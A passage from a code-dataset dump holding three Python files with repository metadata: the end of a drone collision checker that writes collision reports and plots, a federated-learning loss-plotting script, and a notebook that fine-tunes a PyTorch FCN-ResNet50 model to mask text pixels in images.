time_used_in_branches\n\n def _update_states_to_wait_for_slowest_branch(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n time_used_in_branches: List[float],\n drones_involved: Set[str]) -> float:\n longest_time_used = max(time_used_in_branches)\n # for each branch, let drones involved in the branch wait until longest_time_used\n for i, time_used in enumerate(time_used_in_branches):\n for name in parallel_drone_commands.drones_involved_each_branch[i]:\n wait_command = Command.wait(longest_time_used - time_used)\n self._update_states_for_single_drone_command(SingleDroneCommand(name, wait_command),\n state_updaters,\n drone_trajectory_map,\n drones_involved={name})\n # let drones not involved in any branch wait for longest_time_used\n for name in drones_involved.difference(parallel_drone_commands.get_drones_involved()):\n wait_command = Command.wait(longest_time_used)\n self._update_states_for_single_drone_command(SingleDroneCommand(name, wait_command),\n state_updaters,\n drone_trajectory_map,\n drones_involved={name})\n return longest_time_used\n\n\nclass CollisionReportSaver:\n @staticmethod\n def save_check_report(time_slice_info: List[Tuple[str, str, float, float, float]]):\n report_dir = \"reports\"\n if not os.path.isdir(report_dir):\n os.mkdir(report_dir)\n\n file_name = os.path.join(report_dir, \"collision check log (all drones).txt\")\n\n with open(file_name, \"w\") as file:\n sorted_time_slice_info = sorted(time_slice_info, key=lambda elem: elem[2])\n file.write(tabulate(CollisionReportSaver._format_rows(sorted_time_slice_info),\n headers=[\"Drone 1\", \"Drone 2\", \"Time\", \"Distance\", \"Confidence\"],\n colalign=(\"default\", \"default\", \"default\", \"default\", \"right\")))\n\n drone_pairs = sorted(set([(name1, name2) for (name1, name2, _, _, _) in time_slice_info]))\n\n for drone_pair in drone_pairs:\n filtered_time_slice_info = filter(lambda elem: drone_pair == (elem[0], elem[1]), time_slice_info)\n filtered_time_slice_info = sorted(filtered_time_slice_info, key=lambda elem: elem[2])\n\n file_name = os.path.join(report_dir, \"collision check log ({}-{}).txt\".format(drone_pair[0], drone_pair[1]))\n with open(file_name, \"w\") as file:\n file.write(tabulate(CollisionReportSaver._format_rows(filtered_time_slice_info),\n headers=[\"Drone 1\", \"Drone 2\", \"Time\", \"Distance\", \"Confidence\"],\n colalign=(\"default\", \"default\", \"default\", \"default\", \"right\")))\n\n times = [time for (_, _, time, _, _) in filtered_time_slice_info]\n probabilities = [prob for (_, _, _, _, prob) in filtered_time_slice_info]\n fig, ax = plt.subplots()\n ax.plot(times, probabilities)\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(\"Probability\")\n ax.set_title(\"Probability of Collision between {} and {}\".format(drone_pair[0], drone_pair[1]))\n ax.set_ylim([-0.05, 1.05])\n fig_name = os.path.join(report_dir, \"collision probability ({}-{}).png\".format(drone_pair[0], drone_pair[1]))\n fig.savefig(fig_name)\n\n @staticmethod\n def _format_rows(table: List[Tuple[str, str, float, float, float]]) -> List[Tuple[str, str, float, float, str]]:\n return [(name1, name2, round(time, 3), round(distance, 5), \"{:3.3f}%\".format(confidence * 100))\n for (name1, name2, time, distance, confidence) in table]\n", "repo_name": "xDrone-DSL/xDroneLanguageServer", "sub_path": "xdrone/safety_checker/collision_checker.py", "file_name": "collision_checker.py", "file_ext": "py", "file_size_in_byte": 23166, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xdrone.shared.state.State", "line_number": 23, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 29, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "xdrone.shared.state.State", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 37, "usage_type": "name"}, {"api_name": "xdrone.shared.drone_config.DroneConfig", "line_number": 37, "usage_type": "name"}, {"api_name": "xdrone.shared.collision_config.CollisionConfig", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "xdrone.shared.command.AbstractDroneCommand", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 42, "usage_type": "name"}, {"api_name": "xdrone.shared.safety_check_error.SafetyCheckError", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 82, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 84, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "math.isclose", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats.ncx2.cdf", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.ncx2", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 114, "usage_type": "name"}, {"api_name": "xdrone.shared.state.State", "line_number": 114, "usage_type": "name"}, {"api_name": "xdrone.shared.safety_check_error.SafetyCheckError", "line_number": 126, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 128, "usage_type": "name"}, {"api_name": "xdrone.shared.command.AbstractDroneCommand", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 129, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 131, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 134, "usage_type": "argument"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 139, "usage_type": "argument"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 147, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 153, "usage_type": "name"}, {"api_name": "xdrone.shared.state.State", "line_number": 154, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 161, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 163, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 169, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.up", "line_number": 169, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 169, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 174, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.down", "line_number": 174, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 174, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 180, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 180, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 189, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 189, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 196, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 196, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 196, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command", "line_number": 205, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 216, "usage_type": "call"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 226, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 227, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 239, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 252, "usage_type": "call"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 263, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 264, "usage_type": "call"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 268, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 269, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 269, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 271, "usage_type": "name"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 284, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 285, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 285, "usage_type": "name"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 295, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 298, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 303, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 303, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 304, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 310, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 310, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 311, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 320, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 320, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path", "line_number": 353, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 357, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 357, "usage_type": "name"}]} +{"seq_id": "74715991523", "text": "import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dataset\", type=str)\nparser.add_argument(\"--n_worker\", type=int)\nparser.add_argument(\"--K\", type=int)\nparser.add_argument(\"--n_round\", type=int)\n\nargs = parser.parse_args()\n\n#scheme_list = [ 'FEDAVG', 'FEDSVRG', 'RESSGD', 'RESAVG', 'RESSVRG', 'RESSIMUL']\nscheme_list = ['RESSGD', 'RESAVG', 'RESSVRG', 'RESSIMUL', 'FEDAVG', 'FEDSVRG', 'FEDPROX', 'LOCAL']\n#scheme_list = ['RESAVG', 'RESSVRG']\nscheme_names = ['FedResSGD', 'FedResAVG (Opt I)', 'FedResAVG (Opt II)', 'FedResNaive', 'FedAVG', 'SCAFFOLD', 'FedProx', 'Local']\n#scheme_names = [ 'FedResAVG (Opt I)', 'FedResAVG (Opt II)']\n#scheme_list = [ 'RESSGD', 'RESAVG']\n#markers_on = [0,10, 20, 30, 40, 50]\nmarkers_color = ['tab:red','tab:orange','tab:green', 'tab:blue', 'magenta', 'tab:brown', 'crimson', 'gold']\nmarkers_shape = ['s', 'v','o', 'x', '>', '^', '<', 'D']\n\n\nN=args.n_worker\nK=args.K\ndataset = args.dataset\nn_round = args.n_round\n\n\nM = np.zeros((len(scheme_list), n_round))\nV = np.zeros((len(scheme_list), n_round))\n\nfor i in range(len(scheme_list)):\n nameM = \"outtf/\" + dataset + \"/\" + scheme_list[i] + \"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \"_summaryM\"\n nameV = \"outtf/\" + dataset + \"/\" + scheme_list[i] + \"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \"_summaryV\"\n tmpM = np.load(open(nameM, 'rb'))\n tmpV = np.load(open(nameV, 'rb'))\n M[i, :] = tmpM\n V[i, :] = tmpV\n\n\n#font = {'family' : 'normal', 'size' : 22}\n#matplotlib.rc('font', **font)\n\n\nplt.figure(figsize=(6,4.5)) \nfor k in range(len(scheme_list)):\n data_X = np.array(range(n_round))\n data_Y = M[k,:]\n data_V = 10*V[k,:]\n #markers_Y = data_Y[markers_on]\n plt.plot(data_X, data_Y, color=markers_color[k], marker=markers_shape[k], markevery=10+k) #label='_nolegend_'\n #plt.plot(data_X[markers_on], markers_Y, color=markers_color[k], marker=markers_shape[k], linestyle='None', markersize=11)\n \n #plt.fill_between(data_X, data_Y - data_V, data_Y + data_V, color=markers_color[k], alpha=0.3, lw=0)\n #plt.ylim(Lim[i][0], Lim[i][1])\nplt.legend(scheme_names)\n#t = [0, 20, 40, 60, 80, 100]\nt = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90 ,100]\nplt.xticks(t,t)\n#plt.xticks(np.arange(0,60,10))\n#plt.xticks(fontsize=16, rotation=0)\nplt.xlabel('round')\nplt.ylabel('average loss')\n#plt.ylim(0.04,0.1)\nfilename=dataset+\"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \".png\"\nplt.savefig(filename, bbox_inches = \"tight\")\n\n\n\n\n", "repo_name": "bahh723/fedres", "sub_path": "goto_plot.py", "file_name": "goto_plot.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "28989531328", "text": "# %% [markdown]\n# ### This notebook is optionally accelerated with a GPU runtime.\n# ### If you would like to use this acceleration, please select the menu option \"Runtime\" -> \"Change runtime type\", select \"Hardware Accelerator\" -> \"GPU\" and click \"SAVE\"\n# \n# ----------------------------------------------------------------------\n# \n# # FCN\n# \n# *Author: Pytorch Team*\n# \n# **Fully-Convolutional Network model with ResNet-50 and ResNet-101 backbones**\n# \n# _ | _\n# - | -\n# ![alt](https://pytorch.org/assets/images/deeplab1.png) | ![alt](https://pytorch.org/assets/images/fcn2.png)\n\n# %%\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nmodel = torch.hub.load('pytorch/vision:v0.10.0', 'fcn_resnet50', pretrained=True)\n# or\n# model = torch.hub.load('pytorch/vision:v0.10.0', 'fcn_resnet101', pretrained=True)\nmodel.eval()\n\n# %% [markdown]\n# All pre-trained models expect input images normalized in the same way,\n# i.e. mini-batches of 3-channel RGB images of shape `(N, 3, H, W)`, where `N` is the number of images, `H` and `W` are expected to be at least `224` pixels.\n# The images have to be loaded in to a range of `[0, 1]` and then normalized using `mean = [0.485, 0.456, 0.406]`\n# and `std = [0.229, 0.224, 0.225]`.\n# \n# The model returns an `OrderedDict` with two Tensors that are of the same height and width as the input Tensor, but with 21 classes.\n# `output['out']` contains the semantic masks, and `output['aux']` contains the auxillary loss values per-pixel. In inference mode, `output['aux']` is not useful.\n# So, `output['out']` is of shape `(N, 21, H, W)`. More documentation can be found [here](https://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection).\n\n# %%\n# Download an example image from the pytorch website\n\"\"\"\nimport urllib\nurl, filename = (\"https://github.com/pytorch/hub/raw/master/images/deeplab1.png\", \"deeplab1.png\")\ntry: urllib.URLopener().retrieve(url, filename)\nexcept: urllib.request.urlretrieve(url, filename)\n\"\"\"\n\n# Select an image from the dataset\nfrom torch.utils.data import DataLoader\nfrom generate_training_validation_data import CustomImageDataset\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntrain_data_dir = 'D:/MemeMachine_ProjectData/dataset/training'\nvalidation_data_dir = 'D:/MemeMachine_ProjectData/dataset/validation'\nimg_width, img_height, n_channels = 257, 257, 3 #TODO change dimensions to be wider, to better support text\n\nepochs = 1 #50 TODO\nbatch_size = 1\n\n#TODO change image_with_text_functions.generate_text_on_image_and_pixel_mask_from_path to place the text properly\ntrain_dataset = CustomImageDataset(train_data_dir, img_width, img_height)\ntest_dataset = CustomImageDataset(validation_data_dir, img_width, img_height)\n\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, )\ntest_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n# Display image and label.\ntrain_features, train_labels = next(iter(train_dataloader))\nprint(f\"Feature batch shape: {train_features.size()}\")\nprint(f\"Labels batch shape: {train_labels.size()}\")\ninput_image = train_features[0].squeeze()\ninput_image = np.moveaxis(input_image.numpy(), 0, -1)\nlabel = train_labels[0].reshape((img_width, img_height))\n\nplt.imshow(input_image, cmap=\"gray\")\nplt.show()\nplt.imshow(label, cmap=\"gray\")\nplt.show()\n\n# %%\n# sample execution (requires torchvision)\nfrom PIL import Image\nfrom torchvision import transforms\nimport cv2 as cv\n# input_image = Image.open(filename)\ninput_image2 = cv.cvtColor(input_image, cv.COLOR_BGR2RGB)\ninput_image2 = Image.fromarray(np.uint8(input_image2))\ninput_image2 = input_image2.convert(\"RGB\")\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ninput_tensor = preprocess(input_image)\ninput_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model\n\n# move the input and model to GPU for speed if available\nif torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n model.to('cuda')\n\nwith torch.no_grad():\n output = model(input_batch)['out'][0] #zero refers to the batch number?\noutput_predictions = output.argmax(0)\nprint(output_predictions)\nprint(output_predictions.shape)\nprint(output)\nprint(output.shape)\n\n\n# %% [markdown]\n# The output here is of shape `(21, H, W)`, and at each location, there are unnormalized probabilities corresponding to the prediction of each class.\n# To get the maximum prediction of each class, and then use it for a downstream task, you can do `output_predictions = output.argmax(0)`.\n# \n# Here's a small snippet that plots the predictions, with each color being assigned to each class (see the visualized image on the left).\n\n# %%\n# create a color pallette, selecting a color for each class\npalette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\ncolors = torch.as_tensor([i for i in range(21)])[:, None] * palette\ncolors = (colors % 255).numpy().astype(\"uint8\")\n\n# plot the semantic segmentation predictions of 21 classes in each color\nr = Image.fromarray(output_predictions.byte().cpu().numpy()).resize(input_image2.size)\nr.putpalette(colors)\n\nimport matplotlib.pyplot as plt\nplt.imshow(r)\n# plt.show()\n\n# %% [markdown]\n# ### Model Description\n# \n# FCN-ResNet is constructed by a Fully-Convolutional Network model, using a ResNet-50 or a ResNet-101 backbone.\n# The pre-trained models have been trained on a subset of COCO train2017, on the 20 categories that are present in the Pascal VOC dataset.\n# \n# Their accuracies of the pre-trained models evaluated on COCO val2017 dataset are listed below.\n# \n# | Model structure | Mean IOU | Global Pixelwise Accuracy |\n# | --------------- | ----------- | --------------------------|\n# | fcn_resnet50 | 60.5 | 91.4 |\n# | fcn_resnet101 | 63.7 | 91.9 |\n# \n# ### Resources\n# \n# - [Fully Convolutional Networks for Semantic Segmentation](https://arxiv.org/abs/1605.06211)\n\n# %%\nimport torch.optim as optim\nimport torch.nn as nn\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=10**-4, momentum=0.99)\nmodel.train()\n\n# %%\n# Train the model\nfor epoch in range(2): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(train_dataloader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n output = model(inputs)['out'][0]\n # print(output.shape)\n output = output[0]\n # print(output.shape)\n output = torch.unsqueeze(output, 0)\n output = torch.unsqueeze(output, 0)\n # print(output.shape)\n\n # output_predictions = output.argmax(0)\n # print(labels.shape)\n labels = torch.reshape(labels, (1,257,257))\n labels = labels.long()\n # print(labels.shape)\n\n loss = criterion(output, labels)\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print(f'[{epoch + 1}, {i + 1:5d}] loss: {running_loss / 2000:.3f}')\n running_loss = 0.0\n\nprint('Finished Training')\n\n# %%\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\n test_loss /= num_batches\n correct /= size\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n# %% [markdown]\n# Show a test of the newly trained (fine tuned) model below\n\n# %%\nmodel.eval()\n\n# Display image and label.\ntest_features, test_labels = next(iter(test_dataloader))\nprint(f\"Feature batch shape: {test_features.size()}\")\nprint(f\"Labels batch shape: {test_labels.size()}\")\ninput_image = test_features[0].squeeze()\ninput_image = np.moveaxis(input_image.numpy(), 0, -1)\nlabel = test_labels[0].reshape((img_width, img_height))\n\nplt.imshow(input_image, cmap=\"gray\")\nplt.show()\nplt.imshow(label, cmap=\"gray\")\nplt.show()\n\n# %%\n# input_image = Image.open(filename)\ninput_image2 = cv.cvtColor(input_image, cv.COLOR_BGR2RGB)\ninput_image2 = Image.fromarray(np.uint8(input_image2))\ninput_image2 = input_image2.convert(\"RGB\")\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\ninput_tensor = preprocess(input_image)\ninput_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model\n\n# move the input and model to GPU for speed if available\nif torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n model.to('cuda')\n\nwith torch.no_grad():\n output = model(input_batch)['out'][0] #zero refers to the batch number?\noutput_predictions = output.argmax(0)\nprint(output_predictions)\nprint(output_predictions.shape)\nprint(output)\nprint(output.shape)\n\n# %%\ntest(test_dataloader, model, criterion)\n\n# %%\n\n\n\n", "repo_name": "MaxNiebergall/MemeMachine", "sub_path": "TextPixelMasking/pytorch_vision_fcn_resnet101.py", "file_name": "pytorch_vision_fcn_resnet101.py", "file_ext": "py", "file_size_in_byte": 9371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.hub.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 21, "usage_type": "attribute"}, {"api_name": "generate_training_validation_data.CustomImageDataset", "line_number": 59, "usage_type": "call"}, {"api_name": "generate_training_validation_data.CustomImageDataset", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 84, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 88, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 89, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 90, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 119, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.moveaxis", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 231, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 232, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 232, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 232, "usage_type": "call"}, {"api_name": 